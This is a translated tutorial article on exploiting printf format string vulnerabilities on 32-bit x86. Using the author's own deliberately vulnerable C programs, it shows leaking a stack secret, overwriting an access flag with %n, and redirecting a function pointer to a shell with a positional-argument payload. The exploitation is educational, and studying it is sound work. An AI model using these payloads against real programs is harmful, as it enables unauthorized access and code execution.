
Printf Oriented Programming



Intro


To my surprise, I could not find any articles on this topic, so I would like to correct that with this one. In it I will try to explain Format String Attacks as clearly as I can from the attacker's point of view, with some simplifications. In practice these simplifications are easy to work around, but I do not want to dwell on them. Besides invaluable knowledge, a small bonus awaits the most persistent readers who make it to the end.

Why is it even needed?


Like other vulnerabilities, Format String Attacks are used to gain unauthorized access to a program and do whatever you want with it. An important feature of this vulnerability is that it is indifferent to additional protections such as W^X and ASLR. Most importantly, it lets you bypass the relatively new CFI protection.

Let's start?


I have always found it easiest to understand what is going on through examples, so without further ado, straight to the code.
    #include <stdio.h>

    void f(char *str) {
        char *secret_data = "My Awesome Key";
        printf(str);
    }

    int main(int argc, char **argv) {
        f(argv[1]);
        return 0;
    }

For those who forgot about printf
The printf()-like functions work like this:

  • Print the string
  • Replace the conversion specifications that start with %
  • Return the number of characters successfully printed
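The three steps above can be seen in a minimal sketch. The helper name formatted_length is hypothetical and not from the article; it uses snprintf, which follows the same formatting rules as printf but writes into a buffer.

```c
#include <stdio.h>

/* Hypothetical helper: formats "<value>-<word>" into a local buffer and
   returns what the printf family returns: the number of characters
   the format string produced. */
int formatted_length(int value, const char *word) {
    char buf[64];
    /* %d and %s are replaced by the arguments, the rest is copied as-is */
    return snprintf(buf, sizeof buf, "%d-%s", value, word);
}
```

Calling formatted_length(42, "ok") formats the text 42-ok, so the return value is its length.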


What can we do with this? Let's compile our code and run it. From here on we work with 32-bit x86.

    $ cc -m32 format_vuln.c -o format_vuln
    $ ./format_vuln %d
    47

Where did 47 come from? We only asked it to print "%d". The point is that printf is written in C. C has no overloading and printf is variadic, so it does not know how many arguments it was given. It relies on its first argument instead: it parses the format string and, for each %, takes the next argument from the stack.
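How a format string drives argument consumption can be sketched with a tiny variadic function. This is an illustration only, not how any real libc implements printf; the name sum_by_format is hypothetical, and it understands nothing but %d.

```c
#include <stdarg.h>

/* Hypothetical helper: walks fmt and, for every "%d", pulls one int from
   the variadic arguments and adds it to a running sum. Nothing verifies
   that the caller really passed that many ints. */
int sum_by_format(const char *fmt, ...) {
    va_list ap;
    int sum = 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;                      /* look at the character after '%' */
        if (*p == '\0')
            break;                /* lone '%' at the end of the string */
        if (*p == 'd')
            sum += va_arg(ap, int);   /* trusts the format string blindly */
        /* anything else, including "%%", is skipped in this sketch */
    }
    va_end(ap);
    return sum;
}
```

The number of va_arg calls is decided entirely by the format string. When an attacker controls that string, as in f above, the function keeps reading stack words that were never passed as arguments.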

Where did the 47 itself come from?
For performance reasons, values on the stack are not cleared. Memory is allocated and released simply by decreasing or increasing the stack pointer. So 47 is just a leftover value from some earlier computation.

After playing around a little, you can get the coveted key.

    $ ./format_vuln %d.%d.%d.%d.%d.%d.%s
    47.-145670960.-143695128.32768.-143929344.-143936984.My Awesome Key

Why exactly six %d?


Let's look at the disassembled listing of the f function using objdump:

    080483fb <f>:
     80483fb:  55                      push   ebp
     80483fc:  89 e5                   mov    ebp,esp
     80483fe:  83 ec 18                sub    esp,0x18
     8048401:  c7 45 f4 d0 84 04 08    mov    DWORD PTR [ebp-0xc],0x80484d0
     8048408:  83 ec 0c                sub    esp,0xc
     804840b:  ff 75 08                push   DWORD PTR [ebp+0x8]
     804840e:  e8 bd fe ff ff          call   80482d0 <printf@plt>
     8048413:  83 c4 10                add    esp,0x10
     8048416:  90                      nop
     8048417:  c9                      leave
     8048418:  c3                      ret

Our key is stored at address 0x80484d0, and a pointer to it is written to the stack at ebp-0xc. Our first argument is at ebp+0x8.

The sub esp, 0x** instructions allocate space on the stack, and clearly much more than is needed. The excess is alignment padding, which compilers insert automatically for performance.

So if you look at the stack just before the call to printf, it becomes clear where the six %d come from.
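The count can be worked out from the offsets in the listing. The sketch below only restates that arithmetic; the constant and function names are hypothetical, and the offsets apply to this particular build only.

```c
/* Offsets are relative to ebp and read off the objdump listing of f. */
enum {
    WORD_SIZE     = 4,      /* one stack slot on x86-32 */
    LOCALS        = 0x18,   /* sub esp,0x18 */
    PADDING       = 0x0c,   /* sub esp,0xc */
    SECRET_OFFSET = -0x0c   /* mov DWORD PTR [ebp-0xc],0x80484d0 */
};

/* Number of stack words printf consumes before it reaches secret_data. */
int words_before_secret(void) {
    /* push DWORD PTR [ebp+0x8] places the format pointer at ebp-0x28 */
    int format_slot = -(LOCALS + PADDING + WORD_SIZE);
    /* printf takes its first "argument" from the slot right above it */
    int first_vararg = format_slot + WORD_SIZE;          /* ebp-0x24 */
    return (SECRET_OFFSET - first_vararg) / WORD_SIZE;
}
```

The slots from ebp-0x24 up to ebp-0x10 hold six words of leftover data, which the six %d consume. The seventh slot, ebp-0xc, holds the pointer to the key, which is why %s comes seventh.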



Lesser-known printf features


In addition to potential data leakage, printf has other interesting features.


For example, having the following code:

    #include <stdio.h>

    int main() {
        int i, j;
        printf("Hello%2$n, world!%1$n\n", &i, &j);
        printf("%d %*d", i, 3, j);
        return 0;
    }

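we get the output below. Here %n stores the number of characters printed so far into the int that its argument points to, N$ selects the N-th argument, and * takes the field width from an argument: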

    $ cc -m32 printfwrite.c -oprintfwrite
    $ ./printfwrite
    Hello, world!
    13   5
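The two numbers can be reproduced without positional arguments. This is a minimal sketch with a hypothetical helper name, record_counts. It assumes a libc that accepts %n in a string-literal format, which some hardened C libraries refuse.

```c
#include <stdio.h>

/* Hypothetical helper: formats "Hello, world!" into a scratch buffer and
   uses %n twice to record how many characters had been produced at each
   point in the format string. */
void record_counts(int *after_hello, int *after_all) {
    char buf[32];
    /* first %n fires after "Hello", second after the whole text */
    snprintf(buf, sizeof buf, "Hello%n, world!%n", after_hello, after_all);
}
```

After the call, the first int holds the length of "Hello" and the second the length of "Hello, world!". These are the 5 and 13 from the output above, stored in the opposite order because the article's format string uses 2$ first.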

This functionality opens up new possibilities for exploitation. Let's change our old code a bit and see what we can do with it.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    void f(char *str, int acc) {
        int *access = &acc;
        printf(str);
        if (*access) {
            puts("Secret information revealed!");
        }
    }

    int main(int argc, char **argv) {
        char *usr = getenv("USER");
        if (usr == NULL) return EXIT_FAILURE;
        /* compare contents; usr == "kitsu" would only compare pointers */
        f(argv[1], strcmp(usr, "kitsu") == 0);
        return 0;
    }

    $ cc -m32 printfacccess.c -o printfacccess
    $ ./printfacccess %d.%d.%d.%d.%d.%d.%n
    -4922064.2.4.-4922088.-143168832.-145108519.Secret information revealed!

But what if the number we need to write is very large? The address of a function, for example. The first thing that comes to mind is to pass a string of the corresponding length. Say we know the shellcode address and control the printf format string; what do we do?

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>   /* execve */

    typedef void (*fptr)();

    void routine() {
        /* do something useful */
        puts("Routine done.");
    }

    void shell() {
        execve("/bin/bash", 0, 0);
    }

    void f(char *str, fptr p) {
        fptr ptr = p;
        printf(str);
        ptr();
    }

    int main(int argc, char **argv) {
        f(argv[1], routine);
        return 0;
    }

The address of shell after compilation is 0x80484d4. We print an arbitrary character that many times and then overwrite the function pointer.

    $ cc -m32 printfshell.c -oprintfshell
    $ ./printfshell `python -c 'print("0"*0x80484d4 + "%n")'`
    bash: ./printfshell: Argument list too long

Alas, bash did not like this idea very much. But we can achieve a similar effect with the field width already mentioned, and then write the number the same way with %n.

    $ ./printfshell `python -c 'print("%1$134513876.0X%7$n")'` >out
    $ echo "$$"
    $ exit
    exit
    $ echo "$$"
    3899
    $ tail -c 4 out
    3920

Now let's take a closer look at the miracle that happened here. We ran our program and it launched a new instance of the shell, which is exactly what we wanted: the PID written to out (3920) differs from the PID of the original shell (3899).

So what does "%1$134513876.0X%7$n" actually mean?


It consists of two conversion specifications, "%1$134513876.0X" and "%7$n".

%1$134513876.0X prints the first argument to stdout with a field width of 134513876 (the address of our shellcode, 0x80484d4, in decimal). What is printed does not matter; only the number of characters does.

%7$n writes to the location pointed to by the 7th argument. It stores exactly the number of characters printed so far, i.e. the shellcode address.
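The width trick can be tried in isolation with a much smaller number. This is a minimal sketch under the same assumption that the libc accepts %n in a literal format; the helper name count_after_padding is hypothetical, and it writes into a local int rather than a function pointer.

```c
#include <stdio.h>

/* Hypothetical helper: pads a single hex value to `width` characters and
   lets %n report how many characters that produced. The printed value is
   irrelevant; only the field width decides the count. */
int count_after_padding(int width) {
    char buf[1024];          /* keep width below this size */
    int written = 0;
    /* '*' takes the field width from the argument list */
    snprintf(buf, sizeof buf, "%*X%n", width, 0x2Au, &written);
    return written;
}
```

With a width of 300 the count is 300, although the format string itself is only a few bytes long. The same mechanism lets the short string in the article produce a count of 134513876 without passing a huge argument to the program.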

Conclusion


As you can see, the printf()-like functions have enormous power. Absolute power, even: as it turns out, they are Turing-complete, which means they can potentially do anything a hacker might want.

How? Through fairly long and complex format sequences, which you can play with, for example, here. The guys from USENIX compiled brainfuck code into format-string sequences. The repository contains examples such as Fibonacci numbers, 99 bottles of beer, and many other interesting things.

Source: https://habr.com/ru/post/274329/

